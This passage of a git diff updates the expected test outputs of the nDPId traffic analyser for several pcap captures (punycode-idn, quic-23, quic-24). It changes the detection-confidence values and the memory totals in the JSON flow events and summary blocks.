{"4":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1643874961730,"flow_last_seen":1643874961751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1643874961751,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.love.xn--55qx5d","url":"www.love.xn--55qx5d\/","code":0,"content_type":"","user_agent":"curl\/7.77.0"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1643874953669,"flow_last_seen":1643874953689,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":45520,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Spotify","breed":"Acceptable","category":"Music"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1643874953695,"flow_last_seen":1643874953696,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"192.168.2.1","src_port":60156,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1643874961730,"flow_last_seen":1643874962305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1643874961730,"flow_last_seen":1643874962305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":711,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1643874962305,"l3_proto":"ip4","src_ip":"192.168.2.140","dst_ip":"170.33.9.230","src_port":56011,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"punycode-idn.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":1068,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1643874962305} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 16/16 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872149 bytes -~~ total memory freed........: 5872149 bytes -~~ total allocations/frees...: 118145/118145 +~~ total memory allocated....: 6005783 bytes +~~ total memory freed........: 6005783 bytes +~~ total allocations/frees...: 120907/120907 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 790 chars diff --git a/test/results/quic-23.pcap.out b/test/results/quic-23.pcap.out index fb7784a9d..4ec4344fe 100644 --- a/test/results/quic-23.pcap.out +++ b/test/results/quic-23.pcap.out @@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1568282515655} 00639{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568282515655,"flow_last_seen":1568282515655,"flow_idle_time":200000,"flow_min_l4_payload_len":1280,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":1280,"midstream":0,"thread_ts_msec":1568282515655,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02201{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1568282515655,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1342,"pkt_l4_len":1288,"thread_ts_msec":1568282515655,"pkt":"nJcmWLFfnLbQWTW8ht1gDdl5BQgRQC5Kd00m\/X+beFstG0+KY8c7zJmR+rq64c0q4v2zvsWrxKMBuwUI0EbI\/wAAFwhgax2p4Mt\/UAjcZWkdxzWqcwBE5rEFViXUV0In7d2dXZD4W8++zjZDJBAgmoI+svdNaYLoeL2jqHl80IO9pEfUmkgFWLrT4IlQo8t\/87yXQq3IRCWsbaCVh5W99qNLF16ofVb625RKhJQKN3iU3vpP3WaISyCxGoJXiHsP7sj27ny7LXNNKzH3JhZ3bhiQLS2umcd29X6XChqhAWZjn23A4EHWtq4oNdhkFu8LZI\/zfG+rUZSQr5lxakbHyPuebWPbqVuz09T5esBIjonthwzDSYvYZa0ySbIdmaeXdhlU+E4gLC4WHroq5LZx9pnr7yREt9Dp2HJiUOt1EMzTCveDJnfcPHqR1d6\/YEuvBxkwGcxK7MQsgXVVjQjLsVYM3zgE\/nenut5XK3K7bJeAGfZxUrn\/Y\/S6NaLxM1FgdUyaPkXMATL13fHOLn2TPbUyanoNHsWUaGSz60C+oUnJItBjv49AfcrV5AnxAjninyCVT7ilbuKRBYQ5SPLHeBsT\/NbnYJzK0I1Zj3I7weUUkkcrweRBiR069XTJtWYqzSUqWU5sALkglRvuf6xbvYulQ0jX8ozHEripA5ju8KQBmPJZP7WSUIMlyS8g26Pb2k443GZRz9hlPYNrTsHRc88FbzG8+ahhy1UIvmg27b6gKLWKeoPRPqT\/23G0Wo1ikM4FoXKXzvnDWe1X8Z9PVn+LOSHYR1LqJoMp2f2mWQv847crRAwAw1YWxPVKlFpXb0rR+0hsSK+RIdQgAqDBA2QX26xlMLPLaV5FnoRKfTJi7o9j6TamnIQyR\/b\/g\/IDH2Be62ORQ7K4p27Oyqju5N6C9b0vid0F4+gZ13RNe5vPbvcGGwDUSCHzH5HuKrGh25US\/X91xJ8gist97L0Lrq0S80URKpcxHqC0QxbI4sgi04MOC\/6\/5f2icaiX5IcU\/hdojFqggO95m2grFOU8yda1Z+a+0B+UTPAWzUgGxyOkCthMdR1xVGZfRvlXwGjfBMd6dc\/vwfyp1b8YonfSnSW3vRZZoOvGgqRgE1cEyUD4uXR+I9J+U7b3lAENyqEE6S4PVFwPk4xcaNCNEAFsAmLQRfMnqgm4EclQ2fu\/X4rXYn\/w4VPhxSJ7gZUA4NgNeVynLRKqHUa727Gwo4yXA2fLLCZot4qNfI9GV8gEGhiMrmnJDuuHONvYi8VFwSgiQP9jsRAqGAnvDEEaUirzATf+CkE90c9u9BJN208aRmeL0Hgd\/ZHM6TlLySnssgUghAaObIZXCdBIsYxzkTGX3jv35junPGfSl4SRLk2gvnSptlPR\/Rn6scXnHyxcxY1Tth69QcUpqe9cAH3STuQaFNZjD1dVf2R7djGBGP8XFpAEp4Da6SL0QShqq2TI46wOMWpyGEWgp5CuFAlZyh9lsxPPSVCNRF6ZIHFDEA176ay7PnXocWlpL62qyFOm8ITDpOqmFNLCDdEm1Gb4uY5DgmlqhAIdCuIUzNcLPBAucHSIQlvc6jwsUov+EyqsbCmhoguNjYqYWkTXfROVcd+bJTmI+cPOgPBBwa2oOWk+BLrQ6aBz1dQvhb5YuoZMwA09AEkY+2M7NcQxKjjOU+yU4Hx1Fn0nTrg3sFfxY6wAlusfFhQgzHz4cuAwlvBXae00jqiXWXUvQQ1Rtfra3X+TNbZCCp1e2k+Vki2RypB\/ckwHS7gD9wnM+\/\/rgzF\/7w=="} -00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568282515655,"flow_last_seen":1568282515655,"flow_idle_time":200000,"flow_min_l4_payload_len":1280,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":1280,"midstream":0,"thread_ts_msec":1568282515655,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"h3-22","ja3":"d9e7bdb15af8e499820ca74a68affd78","tls_supported_versions":"TLSv1.3"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568282515655,"flow_last_seen":1568282515655,"flow_idle_time":200000,"flow_min_l4_payload_len":1280,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1280,"flow_avg_l4_payload_len":1280,"midstream":0,"thread_ts_msec":1568282515655,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"h3-22","ja3":"d9e7bdb15af8e499820ca74a68affd78","tls_supported_versions":"TLSv1.3"}} 02197{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1568282515692,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1342,"pkt_l4_len":1288,"thread_ts_msec":1568282515692,"pkt":"nLbQWTW8nJcmWLFfht1jg4MNBQgRKzvMmZH6urrhzSri\/bO+xasuSndNJv1\/m3hbLRtPimPHAbvEowUIuNfA\/wAAFwjcZWkdxzWqcwhFc8YEuuNHtABAtpp6lo422zhpwEmkM9jMJwXgbUjN1owR7TPZ1JXY0x3to1D6g0dAafVV30k+fGVC\/0C4Lnu2sLDcx8bF+ojnk3GSUQTIdHu8ZX\/oVbrFn8IuIOJ3OaMKQNh30NDOQmduQ87svdAwpsnJ5RCWJgsXaKkJYeNxtTrcf\/UMkEEGwqmH7iXERiPPP6YaygHazOGgvsi3IgRqxtSyogodVJFIEF7\/I\/hK4c4fV\/Fp6TOnZq7yPU8RHUGd6f8AABcI3GVpHcc1qnMIRXPGBLrjR7REF+M5klzW6SVGEmXEZf3SgmWO3YJGZMJzHMMmsHpZMJuleNbNpwTfLHRv+w8U8jTxrick9JoK2C0BLjMMU4lyZBfsOtqy8CVjK71G6biWjirvwKveDUbbdnabD6oNKRkjU10KrpsRv07\/rr3\/DxiYNICA4+aqMz+EOwXWo58jzMZwzCPamN69kB0IxZj8SzHACrAvpI3mhJaTesCVi09n+Vjx8LN1j9+ciB82njpNGQqupy7Qg1DSJdzbPwEAh71uJyF2iB3iJGpO+cy2cML4KVvm81IPGXCiOmV58o3v5\/zmODjNmo2sfVOW9wf6PkvwpMzRrLhfpb7g\/8GFhwl4Yw4+ghn0eekbQWZnpZKkF4+ktWY8mTGVecRfIhXVpZaHrV6+jU8BF4DL68+dkgY\/AI15OZZ52IXevPDJv5nQvF4MBVYN4PDEtox+qpac1LTHNAeqQxSa69g15gLUO1TxuS1ywL2AY+BTIWioy9hE61HxGs\/ZqgzZK9mcRJcA1dvWBNaIUiSpdORjz8n0pKG8K\/4ou3pHJN8tLdmk66Qlvhq4T7hwQDIwVgb9q3keP6FrYLSeg\/J0qh+c2s9xPzmAsIVg9ZVDDHWX3Bcun6KxexZ4flHGnhxx5gihdcmy838IeEFcy7du2wwafPbat0Jj+jGrpEh+yIEM+DtfZqs9yQEdy\/MqTQFZpt+aZuMVHvsRxgp9ckGC0lTv66FWbXDl0UazKFBVhBALr2J0iQx9RaI2aenslg1ZNK4Bc+Cb91EVBWrZM10MM25SZ+fC29ATKbXKDxWyuH+nM3ACeSqc9x6e7lODjH2H79xEPA8nXIZozszF8WDBA9K6wgnma97DIVxV4gV9QTaSzRRZf7GOTqGIfycjVC4dW+EtiHjVND4FWrZia3IFSniSe\/c6Z8zy01Y4U7isxhUZE84FRn4gZ+V\/LlAqURAOifpcMdrbloG+azDOECnPpupOebIuXwWz7aOW1fuY\/H1I+R4NtFDR8J3Xw+payk7QhXdsFx5GWInJP3dTMaCf7cVsQwH9u0KYAcwhL8Cwh+DnwFPiuH4IialTTqxwU\/T+06FOuOrMPq+bKnPZ5FwJAgHNilWYjP7NfZyL47Oq9aVGecGeTMEVn1UOO1QiFCmqyGvATws+6y3jOAqvQGQaZwrrHaE+V+KOl6f9J9WMLa6SkuWVKt++KVL5CFRWylgx+1d9Uek8ct9jA8ZlmfNzZ9cA+5HqJ1DeuTlGJqOlBCtnXfinCTal7z1JN5uB10EcGFFvKfAbK7xwlVGsEn6XXUBj0DLCMr40cur5GW3A0wuiby+nlkq7AslBw7l3uUqOibKhCVQJrTyCrMLKjl7uaVf6toOqyI\/5H1Aamf9JQmaiBUuE66iZeoeNEFEyhhGDVA=="} 01764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1568282515692,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1017,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1017,"pkt_l4_len":963,"thread_ts_msec":1568282515692,"pkt":"nLbQWTW8nJcmWLFfht1jg4MNA8MRKzvMmZH6urrhzSri\/bO+xasuSndNJv1\/m3hbLRtPimPHAbvEowPDFkLs\/wAAFwjcZWkdxzWqcwhFc8YEuuNHtEMUyYrBFar3hn3903Wyiwal5ts19EiC\/\/0o403TuQXHzpo07QLjQNsCS6rfVQ9h\/bhZfcPHM1NTnnZdcI\/w+qZX0yTnNRovgdVWw6cVvyMMf\/AR4wKYphPcoUgcwsn7KReOxOm3nR3LYOawLtgN5YWMmql7MzZUW1CzcSjBB+M6TJiRoKw93nPerpbhVcyLUx25I3\/NADqEJnBz21jEouIL682I+IDJYwKoa48yaEr6CLTsyyGj\/lts\/4JjTKWASRBqsw7OY\/PZ+1W1OwDSwb\/PFJvlZQUl\/G5xBYfmg9n3A5KSgPg+AWI0iah3p4kBgWKDCRmgMv5aLdZqf97KuUEYmV3E77OatXFisUIwNgupj2ZBePSzcVFv6BviacQ0eIFnW\/WBQ8G99nQvGQgIVYRbS86l3ozgh4LzmRsw5Qx1M20rfV7sH8J5eDfvoJvM8Kt39vBoA2a\/YDhQooz13TukgVejyLKskuIKc854y2yoygBAiap3h\/2UZI1Hy+ylvot5B+\/VTalIWeEUdzPMUhYFiTMO6\/2d1DRzWkipTCjRPVLHWEScPJdEJ+VMNpVWsin+bWqHvT4BQnmP9jratt0VWOV2ObUqvupTouCJiGV9bM1dHvlMD7MRwtSrbsmRdsKZ3s9ntmpvH57yloY2vd7s1jXD5Tju8J3B+9DUXz6xNltvws\/LFUo2CSsbLQjNtWY3s5dPyf5CxKUWscmwismYbV97k961UCmVvPNlUhdtJ0fKJNxq75eNdsxnG3\/awZI3OuFYwxViRQiZCNMdgzOZGSKYfAy7Lp\/MhmSQ7bAc+NzZptzeI2dGY6EavQ3CQJraclZiH\/R2wGoMhKXvX1vwKDaGVZ6fDICtnupheoKdKLVVe1JbFxgSvP1CvU\/Fz5zvnUrUFgqsCm6EqZc9b0Nx46hJuQ+nXvuD7J3wzTSb4pIdJo3654drX\/so2eyJPJ93U+qbVr7vq7ywwBxcwDyk3BB58zXgOMZkN4mMUtFH32aXAokBlkhQ6f8WPzuTxuiyG3qJM8aRb4I2zN7cmOkjaJPcEMZK3GVpHcc1qnNubgcg9n\/B+tCxShTYqf9BsxGc4HfmCIwhwjiuwdU27nolghC\/g0vijyYzvRU15Q2hMyPcrtTOsXP1UDcSAxAEOHoM9K86QNjMEWUkGPI0wcCBc5w6OEh9AHnk5JwjWpUceKbwoH7jh6GuoflfGRMbCEmAFjB4Wu0Zq5vel1+DIem2Tl+i"} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1568282515655,"flow_last_seen":1568282515762,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5951,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1568282515762,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-23.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1568282515655,"flow_last_seen":1568282515762,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5951,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1568282515762,"l3_proto":"ip6","src_ip":"2e4a:774d:26fd:7f9b:785b:2d1b:4f8a:63c7","dst_ip":"3bcc:9991:faba:bae1:cd2a:e2fd:b3be:c5ab","src_port":50339,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic-23.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":5951,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1568282515762} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880205 bytes -~~ total memory freed........: 5880205 bytes -~~ total allocations/frees...: 118155/118155 +~~ total memory allocated....: 6013839 bytes +~~ total memory freed........: 6013839 bytes +~~ total allocations/frees...: 120917/120917 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2206 chars diff --git a/test/results/quic-24.pcap.out b/test/results/quic-24.pcap.out index 4d2de98e5..f2696dc19 100644 --- a/test/results/quic-24.pcap.out +++ b/test/results/quic-24.pcap.out @@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1574209133040} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574209133040,"flow_last_seen":1574209133040,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1574209133040,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574209133040,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1574209133040,"pkt":"ClnTQ78Jzivom94WCABFAAUA04pAAEARTk4KCQABCgkAAqHcAbsE7BkSw\/8AABgSKZqySaf1jUZ9aFypIIlM688aEfXDUlabjvj32ExHj28K\/LzWAES33jM5bR+MtpU1BLUazwIKZfi2UUsjupyQtwh0cwaTGSNsc3ziOvMvl5HeN7dnqFzrpWV5xSzaGXCCKPfdH3vP8j3J6ZLIzElZQZR3emJo528x+jgZIHOdaSnx3DWXxF2zh+YTIF4T7iX6QufVjaqbZGcqLfU2h5UhvDV4FwyX3uhlDNyKeZHYtgm98LQqq4\/RRT1KTyGKWwsLmYKiT2RZhGfdnj7cabAAzsX7Lk2p9chyJNCYC2rvLfiUJPAyxycnjNSX2Lj6Aqa8nfo2RgXdwfCaQgxab+TGB6bvb9v+EsUoxuSJh+r\/RN\/6YKeOx43w+asFLV8uu4y7ez42UTvh8WhWB9gu2sFvRZZAH2gXrPZjvaMUKjvUztSfZobDePj\/3bGH7ParnvadIlRAYU9Q2+DurqTinGpGLj1JdKLQoxeMx5eGSPtbuqNyirKapdyXJ8ZKCVjdL9m2B38WlanD9I0yGpWtoLvsOi8f8x\/fhHjJnp\/JSreuYABX7IvE9OH17Ka\/DYXSP3horLga3cmeawXPCcyfSVzp0vy3ZIaVNlu8tvkbFVJwffn9HIFK6HKNWjCpRF+ahuWdOTEeIZZ7i7JR8vw5bYFyaufxilZin8M6RIaJMeMrQc4vvfUfbDjsZuuyfMbD+CtkYjt3ODwFx3+9dnCnls3bcnN\/LK\/fVogu1W6dC2V8OgzkkQDp+glgaZFK3x1y9W9tAnAfcG86bUqaAVXac16E+jbjt3xUVxE3wSFwqpaXR87jZ7puVI7a++RK4x\/CPU7cBx4HxakipMRXAW7+Zzm5Uylji8R1ndMJge591UykzR\/a1rIFwcUFafwyzFwutVakAK\/iM4YhBMTpFZmHTyv44rZt\/SzvRW3ChO61o38I1VeCK0g8ZFXOiuIW\/pELm4Rr3xBh76iDlvWF6YcC0+i92ff1n2MDPlwUBp2JPBEhF9KRkoluOW0vEGZjgOTNF0WO0oSPjp6cRmPu7QFACVxUUAGGJ52pSjmae6FO4iTNFAYtrcv+HXjZLY56ae9mCQOyLL1m06CQPGFQiHOPr2CJqh4awJXrhUafIQCu5ugPi3shAySSxxSNpoi1XFyoXHmAfehBuKAMDEBi\/K2+sO4vF3gp9aph5gyVGEs0pc0rnIKidNla3xHEAlRzhJVd750Uscx9utTZFhNIJHFYbXnWol4tLG+jZZli4l18thfxYBatUVfQbpNdD\/lD+eYzZtOp7YtW1ZKF+ROaDrWxEjfCdVtcjK18Uyjgz5TeZuG7pFJ5t3qyXb+n\/5MzCAN9XPJPpQiYdvqPfvMUwezKWPFBlXc3KAr8TrBHXbzxwj68KugT8kPF6Hf1ZknvffVMbgWpKERCnzNCkdVDHz0qsfdTxN1E8gHLdnzTTb4wYHbDra2Qy1AzeGTZ5VuCqGVCxMyMSucpv1SUY2NRHw7nEKVm2pvwZDPcCeEad3kICbdC4XAMVUx0Mf\/rJlO1G38DhZUFTtkiOIXY+C24n5VM7VxZQ+dzu2YG1ROOR1dGwLm4sR7mTJIH6rldcwpGAOA19nihJl7wI7sV3QgaIXVtqDL9j\/YH7Q44xODtLK6dfnLZ9llZp8VromtwQj2StAFDoQ=="} -00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574209133040,"flow_last_seen":1574209133040,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1574209133040,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-24","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}} +00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574209133040,"flow_last_seen":1574209133040,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1574209133040,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"localhost","version":"TLSv1.3","alpn":"h3-24","ja3":"b3e43d74f4b790abca2f5fe7dd06e7cf","tls_supported_versions":"TLSv1.3"}} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574209133041,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":177,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":177,"pkt_l4_len":143,"thread_ts_msec":1574209133041,"pkt":"zivom94WClnTQ78JCABFAACjQSNAAEAR5RIKCQACCgkAAQG7odwAjxS18P8AABgR9cNSVpuO+PfYTEePbwr8vNYSuDzEUSnLqX7jSNZH88cG3IWnEimaskmn9Y1GfWhcqSCJTOvPGgt6q75e4Qn+zUFJSyFY0SIiHRpQLjIDBESVGuKc8OTad8PhKZ1BA74OASFH4nOmQVGBciF1MYu4zBXJkM1rI\/zCp6CTKJAyA9IF"} 